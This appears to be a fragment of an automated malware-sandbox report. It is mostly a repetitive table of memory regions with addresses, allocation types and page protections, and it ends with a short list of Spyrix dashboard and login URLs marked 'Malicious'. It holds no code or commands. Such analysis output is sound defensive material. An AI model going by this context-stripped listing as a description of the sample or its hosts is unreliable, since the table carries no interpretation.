heap
page read and write
2AE1000
heap
page read and write
96B000
heap
page read and write
24A0000
direct allocation
page read and write
3230000
heap
page read and write
34D0000
heap
page read and write
393F000
stack
page read and write
8200000
trusted library allocation
page read and write
31C4000
heap
page read and write
1750000
heap
page read and write
6786000
heap
page read and write
892F27E000
unkown
page readonly
A84000
heap
page read and write
29CB000
heap
page read and write
6BA000
unkown
page write copy
35F3000
heap
page read and write
18D0000
heap
page read and write
1006000
heap
page read and write
1CE891C4000
heap
page read and write
6BA000
unkown
page write copy
227A000
direct allocation
page read and write
7FE43000
direct allocation
page read and write
347F000
direct allocation
page read and write
27405471000
trusted library allocation
page read and write
929E000
stack
page read and write
8130000
trusted library allocation
page read and write
7FDBE000
direct allocation
page read and write
4F2F000
stack
page read and write
A84000
heap
page read and write
31C4000
heap
page read and write
C6D000
heap
page read and write
7F4000
heap
page read and write
5B3000
unkown
page read and write
775000
heap
page read and write
31C4000
heap
page read and write
274054D9000
trusted library allocation
page read and write
B00000
heap
page read and write
34B0000
heap
page read and write
179E000
heap
page read and write
9C8000
unkown
page execute and read and write
19E000
stack
page read and write
5F2000
unkown
page readonly
3EF0000
direct allocation
page execute and read and write
3A80000
direct allocation
page execute and read and write
29CA000
heap
page read and write
975000
heap
page read and write
267F000
direct allocation
page read and write
1296000
heap
page read and write
772000
heap
page read and write
26B1000
direct allocation
page read and write
B9E000
stack
page read and write
32FB000
direct allocation
page read and write
2F93000
trusted library allocation
page read and write
3D40000
direct allocation
page execute and read and write
3770000
heap
page read and write
4200000
direct allocation
page execute and read and write
53B2000
trusted library allocation
page read and write
234D000
direct allocation
page read and write
34B4000
heap
page read and write
31C4000
heap
page read and write
4F10000
heap
page read and write
3780000
direct allocation
page execute and read and write
7F3000
heap
page read and write
DF8000
heap
page read and write
3E70000
direct allocation
page execute and read and write
4330000
direct allocation
page execute and read and write
2D08000
heap
page read and write
73D000
heap
page read and write
3D30000
direct allocation
page execute and read and write
324F000
heap
page read and write
61E98000
unkown
page read and write
7FE4D000
direct allocation
page read and write
1CE891D4000
heap
page read and write
2CE7000
heap
page read and write
8130000
trusted library allocation
page read and write
44E6000
direct allocation
page read and write
A84000
heap
page read and write
2FE4000
trusted library allocation
page read and write
27400040000
heap
page read and write
3410000
heap
page read and write
2341000
direct allocation
page read and write
E79000
heap
page read and write
2C80000
heap
page read and write
2AEB000
heap
page read and write
3F30000
direct allocation
page execute and read and write
F7327E000
stack
page read and write
3B00000
direct allocation
page execute and read and write
2D75000
heap
page read and write
31C4000
heap
page read and write
29C1000
heap
page read and write
92DE000
stack
page read and write
3850000
direct allocation
page execute and read and write
A84000
heap
page read and write
8130000
trusted library allocation
page read and write
2FA4000
trusted library allocation
page read and write
2AEB000
heap
page read and write
3353000
direct allocation
page read and write
2740008D000
heap
page read and write
31C4000
heap
page read and write
761000
heap
page read and write
3FF0000
direct allocation
page execute and read and write
37B0000
direct allocation
page execute and read and write
298F000
heap
page read and write
31EB000
heap
page read and write
308F000
stack
page read and write
3D20000
direct allocation
page execute and read and write
412000
unkown
page read and write
454F000
direct allocation
page read and write
38FF000
heap
page read and write
4180000
direct allocation
page execute and read and write
37A0000
heap
page read and write
18C000
stack
page read and write
38F4000
heap
page read and write
4410000
direct allocation
page execute and read and write
324A000
heap
page read and write
4310000
direct allocation
page execute and read and write
22EB000
direct allocation
page read and write
886000
unkown
page execute and read and write
17F1000
heap
page read and write
36F8000
direct allocation
page read and write
40E0000
direct allocation
page execute and read and write
4240000
direct allocation
page execute and read and write
6FB000
heap
page read and write
41A0000
direct allocation
page execute and read and write
36A0000
direct allocation
page execute and read and write
7B93000
heap
page read and write
94E000
stack
page read and write
2F2F000
stack
page read and write
31C4000
heap
page read and write
5FB7000
heap
page read and write
810000
heap
page read and write
3A10000
direct allocation
page execute and read and write
27400F30000
trusted library allocation
page read and write
8130000
trusted library allocation
page read and write
1B88000
heap
page read and write
7FD90000
direct allocation
page read and write
6F5000
heap
page read and write
3590000
direct allocation
page execute and read and write
66DE000
stack
page read and write
805000
heap
page read and write
31AA000
heap
page read and write
A84000
heap
page read and write
8BE000
stack
page read and write
773E000
stack
page read and write
A84000
heap
page read and write
718000
heap
page read and write
8130000
trusted library allocation
page read and write
274000B1000
heap
page read and write
274055B0000
trusted library allocation
page read and write
1CE891AC000
heap
page read and write
31C4000
heap
page read and write
8130000
trusted library allocation
page read and write
7F4000
heap
page read and write
6A96000
direct allocation
page read and write
1CE89150000
heap
page read and write
E15000
heap
page read and write
3420000
direct allocation
page read and write
88C6000
direct allocation
page read and write
8160000
trusted library allocation
page read and write
1CE89188000
heap
page read and write
1E0000
heap
page read and write
238D48D0000
heap
page read and write
4000000
direct allocation
page execute and read and write
A84000
unkown
page execute and read and write
26A3000
direct allocation
page read and write
34B6000
heap
page read and write
3260000
heap
page read and write
34A2000
heap
page read and write
2490000
heap
page read and write
1142000
trusted library allocation
page read and write
892EB7E000
unkown
page readonly
360000
unkown
page readonly
112D000
trusted library allocation
page execute and read and write
3310000
heap
page read and write
34BF000
direct allocation
page read and write
53D0000
trusted library allocation
page read and write
73A000
heap
page read and write
9D3000
unkown
page execute and read and write
27400900000
heap
page read and write
8130000
trusted library allocation
page read and write
2740005B000
heap
page read and write
7F4000
heap
page read and write
6B1000
unkown
page read and write
31C4000
heap
page read and write
3281000
heap
page read and write
1690000
heap
page read and write
680000
heap
page read and write
6EE000
stack
page read and write
7182000
trusted library allocation
page read and write
17CE000
heap
page read and write
3880000
direct allocation
page execute and read and write
31C4000
heap
page read and write
273FFF90000
heap
page read and write
11D9000
heap
page read and write
A84000
heap
page read and write
4F79000
heap
page read and write
3242000
heap
page read and write
7F4000
heap
page read and write
2C7F000
stack
page read and write
4FE7000
heap
page read and write
7F4000
heap
page read and write
661000
heap
page read and write
3281000
heap
page read and write
A660000
trusted library allocation
page execute and read and write
7F4000
heap
page read and write
2B3F000
stack
page read and write
3499000
direct allocation
page read and write
44CE000
stack
page read and write
2D75000
heap
page read and write
A84000
heap
page read and write
27400102000
heap
page read and write
11DD000
heap
page read and write
14A0000
heap
page read and write
A84000
heap
page read and write
7FDF8000
direct allocation
page read and write
3C00000
direct allocation
page execute and read and write
68A3000
heap
page read and write
31C4000
heap
page read and write
27401060000
trusted library section
page readonly
31C4000
heap
page read and write
5E6777F000
stack
page read and write
3CB0000
direct allocation
page execute and read and write
17DA000
heap
page read and write
27405654000
heap
page read and write
E23000
heap
page read and write
915000
unkown
page execute and read and write
33E0000
direct allocation
page execute and read and write
31C4000
heap
page read and write
98F000
unkown
page read and write
2740091A000
heap
page read and write
1CE891EE000
heap
page read and write
29C5000
heap
page read and write
361000
unkown
page execute read
1740000
direct allocation
page read and write
27406000000
heap
page read and write
324A000
heap
page read and write
8130000
trusted library allocation
page read and write
7270000
trusted library allocation
page read and write
27400802000
heap
page read and write
36C6000
direct allocation
page read and write
745000
heap
page read and write
8130000
trusted library allocation
page read and write
5413000
heap
page read and write
31C4000
heap
page read and write
7FD32000
direct allocation
page read and write
39D0000
direct allocation
page execute and read and write
1484000
unkown
page execute and read and write
12AC000
heap
page read and write
3AC0000
direct allocation
page execute and read and write
4F83000
heap
page read and write
7E0000
heap
page read and write
6BB000
unkown
page readonly
7BC4000
heap
page read and write
2B26000
heap
page read and write
30CF000
stack
page read and write
8130000
trusted library allocation
page read and write
A40000
heap
page read and write
3905000
heap
page read and write
17DA000
heap
page read and write
C0C000
stack
page read and write
3FE0000
direct allocation
page execute and read and write
990000
heap
page read and write
4DB1000
heap
page read and write
31E5000
heap
page read and write
3750000
direct allocation
page execute and read and write
D90000
heap
page read and write
2AEB000
heap
page read and write
2D1F000
stack
page read and write
3C60000
direct allocation
page execute and read and write
2CDF000
stack
page read and write
AE0000
heap
page read and write
2B36000
heap
page read and write
8130000
trusted library allocation
page read and write
893037E000
unkown
page readonly
78F000
stack
page read and write
3BD0000
direct allocation
page execute and read and write
A84000
heap
page read and write
4F7D000
heap
page read and write
3810000
direct allocation
page execute and read and write
919D000
stack
page read and write
7C17000
heap
page read and write
1CE891BC000
heap
page read and write
3650000
direct allocation
page execute and read and write
43F0000
direct allocation
page execute and read and write
2EEE000
stack
page read and write
2993000
heap
page read and write
2333000
direct allocation
page read and write
8130000
trusted library allocation
page read and write
A84000
heap
page read and write
2CD0000
trusted library allocation
page read and write
31A0000
heap
page read and write
5E6000
unkown
page readonly
31E5000
heap
page read and write
2392000
direct allocation
page read and write
175B000
heap
page read and write
4DA0000
heap
page read and write
3350000
direct allocation
page execute and read and write
34EC000
direct allocation
page read and write
730000
heap
page read and write
4170000
direct allocation
page execute and read and write
892FA7D000
stack
page read and write
3930000
direct allocation
page execute and read and write
2AF1000
heap
page read and write
48C000
heap
page read and write
2FB7000
trusted library allocation
page read and write
6F5000
heap
page read and write
3DD0000
direct allocation
page execute and read and write
22F2000
direct allocation
page read and write
764000
heap
page read and write
274053E0000
trusted library allocation
page read and write
5FB2000
heap
page read and write
A84000
heap
page read and write
27405540000
trusted library allocation
page read and write
17E5000
heap
page read and write
7F4000
heap
page read and write
806000
heap
page read and write
1B80000
heap
page read and write
2993000
heap
page read and write
34C5000
heap
page read and write
578E000
stack
page read and write
A84000
heap
page read and write
198F000
stack
page read and write
71D000
heap
page read and write
704000
heap
page read and write
51BE000
stack
page read and write
3228000
heap
page read and write
A84000
heap
page read and write
2AA0000
heap
page read and write
12D6000
heap
page read and write
3800000
direct allocation
page execute and read and write
31E8000
heap
page read and write
4F1F000
heap
page read and write
892EE7B000
stack
page read and write
7F4000
heap
page read and write
10F8000
heap
page read and write
88E000
unkown
page read and write
4F79000
heap
page read and write
7FE40000
direct allocation
page read and write
2FF7000
trusted library allocation
page read and write
3CE0000
direct allocation
page execute and read and write
31C4000
heap
page read and write
17AC000
heap
page read and write
A84000
heap
page read and write
4F7C000
heap
page read and write
FFC000
stack
page read and write
310E000
stack
page read and write
31C4000
heap
page read and write
5E6767B000
stack
page read and write
20CC000
direct allocation
page read and write
7F4000
heap
page read and write
274055A0000
trusted library allocation
page read and write
38B0000
direct allocation
page execute and read and write
E36000
heap
page read and write
892E0AB000
stack
page read and write
7FD50000
direct allocation
page read and write
7F4000
heap
page read and write
31C4000
heap
page read and write
24F3000
heap
page read and write
27405460000
trusted library allocation
page read and write
70E000
stack
page read and write
304E000
stack
page read and write
76C4000
direct allocation
page read and write
650000
heap
page read and write
74E0000
trusted library allocation
page read and write
31C4000
heap
page read and write
2AEB000
heap
page read and write
770000
heap
page read and write
238D47F0000
heap
page read and write
8130000
trusted library allocation
page read and write
890000
unkown
page execute and write copy
274000A2000
heap
page read and write
3830000
direct allocation
page execute and read and write
37C0000
direct allocation
page execute and read and write
31C4000
heap
page read and write
238D4929000
heap
page read and write
DD8000
heap
page read and write
3000000
heap
page read and write
293D000
stack
page read and write
361000
unkown
page execute read
3620000
direct allocation
page execute and read and write
17EB000
heap
page read and write
2740007D000
heap
page read and write
38F0000
heap
page read and write
3270000
heap
page read and write
520F000
stack
page read and write
22729B80000
heap
page read and write
8130000
trusted library allocation
page read and write
691F000
stack
page read and write
A84000
heap
page read and write
3E60000
direct allocation
page execute and read and write
8130000
trusted library allocation
page read and write
73D000
stack
page read and write
17E7000
heap
page read and write
94F000
heap
page read and write
239E000
stack
page read and write
67A2000
heap
page read and write
4280000
direct allocation
page execute and read and write
2D43000
heap
page read and write
981F000
stack
page read and write
3780000
heap
page read and write
3990000
direct allocation
page execute and read and write
4390000
direct allocation
page execute and read and write
3EC0000
direct allocation
page execute and read and write
2740002B000
heap
page read and write
34A3000
direct allocation
page read and write
C80000
heap
page read and write
20E1000
direct allocation
page read and write
4EB0000
trusted library allocation
page read and write
753000
heap
page read and write
2C9E000
stack
page read and write
7C5000
heap
page read and write
14C0000
heap
page read and write
3F90000
direct allocation
page execute and read and write
4EAF000
stack
page read and write
A84000
heap
page read and write
27400913000
heap
page read and write
8130000
trusted library allocation
page read and write
E16000
heap
page read and write
2FA1000
trusted library allocation
page read and write
5F2000
unkown
page readonly
2CF1000
heap
page read and write
22DC000
direct allocation
page read and write
8130000
trusted library allocation
page read and write
4D80000
unclassified section
page read and write
20D3000
direct allocation
page read and write
4DEE000
stack
page read and write
3B50000
direct allocation
page execute and read and write
4FE7000
heap
page read and write
2C90000
heap
page read and write
952000
heap
page read and write
7FD6D000
direct allocation
page read and write
458B000
direct allocation
page read and write
8130000
trusted library allocation
page read and write
29CB000
heap
page read and write
759000
heap
page read and write
2AF2000
heap
page read and write
34A2000
direct allocation
page read and write
2EF1000
trusted library allocation
page read and write
4020000
direct allocation
page execute and read and write
2F5C000
stack
page read and write
640000
heap
page read and write
4580000
direct allocation
page read and write
179F000
stack
page read and write
2ACE000
stack
page read and write
8790000
trusted library allocation
page read and write
2AE8000
heap
page read and write
6BB000
unkown
page readonly
37A7000
heap
page read and write
7F4000
heap
page read and write
3310000
direct allocation
page execute and read and write
726000
heap
page read and write
A84000
heap
page read and write
238D4BE0000
heap
page read and write
8130000
trusted library allocation
page read and write
69E000
stack
page read and write
31C4000
heap
page read and write
2AEB000
heap
page read and write
17D4000
heap
page read and write
1F0401D0000
heap
page read and write
3690000
direct allocation
page execute and read and write
40F0000
direct allocation
page execute and read and write
17E1000
heap
page read and write
2410000
direct allocation
page execute and read and write
15D000
stack
page read and write
93000
stack
page read and write
6621000
direct allocation
page read and write
22729B90000
heap
page read and write
3940000
direct allocation
page execute and read and write
19B000
stack
page read and write
1CE89191000
heap
page read and write
A60000
heap
page read and write
37FF000
stack
page read and write
A84000
heap
page read and write
39A0000
direct allocation
page execute and read and write
763000
heap
page read and write
7F4000
heap
page read and write
27400129000
heap
page read and write
E01000
heap
page read and write
89302FE000
stack
page read and write
22A0000
heap
page read and write
274054B0000
trusted library allocation
page read and write
2CD0000
heap
page read and write
4F10000
heap
page read and write
26C0000
direct allocation
page read and write
31C4000
heap
page read and write
42F0000
direct allocation
page execute and read and write
29C5000
heap
page read and write
31E1000
heap
page read and write
17E5000
heap
page read and write
31C4000
heap
page read and write
8130000
trusted library allocation
page read and write
8200000
trusted library allocation
page read and write
2D78000
heap
page read and write
238D4BE5000
heap
page read and write
31C4000
heap
page read and write
3490000
heap
page read and write
27405470000
trusted library allocation
page read and write
4EE0000
trusted library allocation
page read and write
3840000
direct allocation
page execute and read and write
2ADA000
heap
page read and write
38FE000
heap
page read and write
236D000
direct allocation
page read and write
4250000
direct allocation
page execute and read and write
5A9000
unkown
page read and write
44A0000
direct allocation
page read and write
15C0000
heap
page read and write
2AC0000
heap
page read and write
4DB0000
heap
page read and write
98F000
heap
page read and write
2AE1000
heap
page read and write
3870000
direct allocation
page execute and read and write
7D0000
heap
page read and write
A84000
heap
page read and write
6B6000
unkown
page read and write
4A0000
heap
page read and write
4220000
direct allocation
page execute and read and write
7820000
trusted library allocation
page read and write
76F12FE000
stack
page read and write
8E8000
unkown
page execute and read and write
5EE000
unkown
page write copy
6F2000
heap
page read and write
3F60000
direct allocation
page execute and read and write
7F4000
heap
page read and write
F732FF000
stack
page read and write
9D10000
trusted library allocation
page read and write
67DF000
stack
page read and write
2950000
remote allocation
page read and write
4F79000
heap
page read and write
8200000
trusted library allocation
page read and write
31C4000
heap
page read and write
2D0B000
heap
page read and write
215E000
stack
page read and write
11DB000
heap
page read and write
A84000
heap
page read and write
34B7000
heap
page read and write
A84000
heap
page read and write
31C4000
heap
page read and write
31C4000
heap
page read and write
273FFFC0000
trusted library allocation
page read and write
6BB000
unkown
page readonly
34DF000
stack
page read and write
8130000
trusted library allocation
page read and write
9B000
stack
page read and write
3080000
heap
page read and write
A84000
heap
page read and write
4440000
direct allocation
page execute and read and write
3E10000
direct allocation
page execute and read and write
2D00000
heap
page read and write
114B000
trusted library allocation
page execute and read and write
3920000
direct allocation
page execute and read and write
8130000
trusted library allocation
page read and write
37A9000
heap
page read and write
31C4000
heap
page read and write
39C0000
direct allocation
page execute and read and write
39B0000
direct allocation
page execute and read and write
2FD000
stack
page read and write
892F679000
stack
page read and write
7820000
trusted library allocation
page read and write
205E000
direct allocation
page read and write
7F4000
heap
page read and write
892F77E000
unkown
page readonly
34D5000
direct allocation
page read and write
377F000
stack
page read and write
22729B9A000
heap
page read and write
22729B84000
heap
page read and write
3437000
direct allocation
page read and write
7EA000
heap
page read and write
75B000
heap
page read and write
C86000
heap
page read and write
7F4000
heap
page read and write
A84000
heap
page read and write
9DA000
unkown
page execute and read and write
7EC000
heap
page read and write
360000
unkown
page readonly
1F0401D4000
heap
page read and write
8790000
trusted library allocation
page read and write
55BF000
stack
page read and write
61E99000
unkown
page readonly
22BF000
direct allocation
page read and write
5360000
trusted library allocation
page read and write
2D11000
heap
page read and write
6BA000
unkown
page write copy
7820000
trusted library allocation
page read and write
43E000
unkown
page readonly
960000
heap
page read and write
3C30000
direct allocation
page execute and read and write
3BC0000
direct allocation
page execute and read and write
7B0000
heap
page read and write
5EE000
unkown
page write copy
327E000
heap
page read and write
4541000
direct allocation
page read and write
892EFFE000
stack
page read and write
36D0000
direct allocation
page execute and read and write
401000
unkown
page execute and read and write
F50000
heap
page read and write
3480000
heap
page read and write
4EB0000
trusted library allocation
page read and write
17EC000
heap
page read and write
38F7000
heap
page read and write
4120000
direct allocation
page execute and read and write
5EE000
unkown
page write copy
31E1000
heap
page read and write
1CE891BB000
heap
page read and write
22B8000
direct allocation
page read and write
23E8000
direct allocation
page read and write
6B0000
heap
page read and write
64C000
heap
page read and write
31C4000
heap
page read and write
7270000
trusted library allocation
page read and write
400000
unkown
page readonly
5B6000
unkown
page readonly
565B000
stack
page read and write
3D60000
direct allocation
page execute and read and write
31C4000
heap
page read and write
18D5000
heap
page read and write
274013B1000
trusted library allocation
page read and write
4EB0000
trusted library allocation
page read and write
4DB1000
heap
page read and write
7C23000
heap
page read and write
4F83000
heap
page read and write
7F4000
heap
page read and write
E54000
heap
page read and write
6640000
direct allocation
page execute and read and write
2FF1000
trusted library allocation
page read and write
7F4000
heap
page read and write
905F000
stack
page read and write
7783000
heap
page read and write
2300000
direct allocation
page read and write
110F000
stack
page read and write
43E000
stack
page read and write
37F0000
direct allocation
page execute and read and write
274055C0000
trusted library allocation
page read and write
A84000
heap
page read and write
4400000
direct allocation
page execute and read and write
76C000
heap
page read and write
76A000
heap
page read and write
2FE8000
trusted library allocation
page read and write
17E1000
heap
page read and write
E38000
heap
page read and write
5803000
heap
page read and write
8130000
trusted library allocation
page read and write
419000
unkown
page write copy
31C4000
heap
page read and write
31D0000
heap
page read and write
7F4000
heap
page read and write
4010000
direct allocation
page execute and read and write
8130000
trusted library allocation
page read and write
7E7000
heap
page read and write
3190000
heap
page read and write
1E0000
heap
page read and write
A50000
heap
page read and write
3240000
heap
page read and write
274054E1000
trusted library allocation
page read and write
3476000
direct allocation
page read and write
7F4000
heap
page read and write
31C4000
heap
page read and write
2B09000
heap
page read and write
165E000
stack
page read and write
7D20000
trusted library allocation
page read and write
7F4000
heap
page read and write
3488000
heap
page read and write
8130000
trusted library allocation
page read and write
17B3000
heap
page read and write
7FE20000
direct allocation
page read and write
59B0000
trusted library allocation
page read and write
A84000
heap
page read and write
61E89000
unkown
page read and write
1CE891EE000
heap
page read and write
A84000
heap
page read and write
7720000
heap
page read and write
534000
unkown
page readonly
5990000
heap
page read and write
1CE891AD000
heap
page read and write
8790000
trusted library allocation
page read and write
A84000
heap
page read and write
775000
heap
page read and write
DB6000
heap
page read and write
D9E000
stack
page read and write
6670000
heap
page read and write
7FDE0000
direct allocation
page read and write
34BD000
heap
page read and write
881000
unkown
page execute and read and write
17DA000
heap
page read and write
31C4000
heap
page read and write
7AE000
heap
page read and write
24DF000
stack
page read and write
28FD000
stack
page read and write
1666000
unkown
page execute and write copy
31C4000
heap
page read and write
7F4000
heap
page read and write
7FC10000
direct allocation
page read and write
5EA000
unkown
page readonly
3333000
direct allocation
page read and write
4460000
direct allocation
page execute and read and write
39F0000
direct allocation
page execute and read and write
3FA0000
direct allocation
page execute and read and write
27400113000
heap
page read and write
51CE000
stack
page read and write
95000
stack
page read and write
7F4000
heap
page read and write
37E0000
direct allocation
page execute and read and write
1D0000
heap
page read and write
7FE00000
direct allocation
page read and write
7FE17000
direct allocation
page read and write
31C4000
heap
page read and write
7B6000
heap
page read and write
27400815000
heap
page read and write
176E000
heap
page read and write
8130000
trusted library allocation
page read and write
39E0000
direct allocation
page execute and read and write
7F4000
heap
page read and write
8130000
trusted library allocation
page read and write
59A0000
heap
page read and write
17EB000
heap
page read and write
A84000
heap
page read and write
444E000
stack
page read and write
7A5F000
stack
page read and write
A84000
heap
page read and write
224F000
direct allocation
page read and write
8130000
trusted library allocation
page read and write
2950000
remote allocation
page read and write
3486000
direct allocation
page read and write
34AE000
stack
page read and write
745000
heap
page read and write
6FD000
heap
page read and write
4EC2000
trusted library allocation
page read and write
8130000
trusted library allocation
page read and write
664000
heap
page read and write
7E20000
trusted library allocation
page read and write
E1A000
heap
page read and write
4548000
direct allocation
page read and write
238B000
direct allocation
page read and write
A84000
heap
page read and write
52FE000
stack
page read and write
31E1000
heap
page read and write
22729B40000
heap
page read and write
7F4000
heap
page read and write
6B6000
unkown
page read and write
18DD000
heap
page read and write
2ADA000
heap
page read and write
4490000
direct allocation
page execute and read and write
2D49000
heap
page read and write
8130000
trusted library allocation
page read and write
7FDDB000
direct allocation
page read and write
686000
heap
page read and write
31CE000
heap
page read and write
7EC000
heap
page read and write
274055F0000
remote allocation
page read and write
4070000
direct allocation
page execute and read and write
788000
heap
page read and write
17E8000
heap
page read and write
22B1000
direct allocation
page read and write
330E000
stack
page read and write
3560000
direct allocation
page execute and read and write
64E000
stack
page read and write
7F4000
heap
page read and write
17EB000
heap
page read and write
777000
heap
page read and write
273FFFD0000
trusted library section
page read and write
1CE892D4000
heap
page read and write
1460000
heap
page read and write
34B1000
direct allocation
page read and write
2920000
heap
page read and write
4EC4000
trusted library allocation
page read and write
E2F000
heap
page read and write
915F000
stack
page read and write
2AE5000
heap
page read and write
20BD000
direct allocation
page read and write
33F0000
direct allocation
page execute and read and write
17EA000
heap
page read and write
4E60000
heap
page read and write
7FD90000
direct allocation
page read and write
16E0000
heap
page read and write
53B0000
trusted library allocation
page read and write
There are 2408 hidden memdumps, click here to show them.

DOM / HTML

URL
Malicious
https://dashboard.spyrix.com/
https://dashboard.spyrix.com/
https://dashboard.spyrix.com/login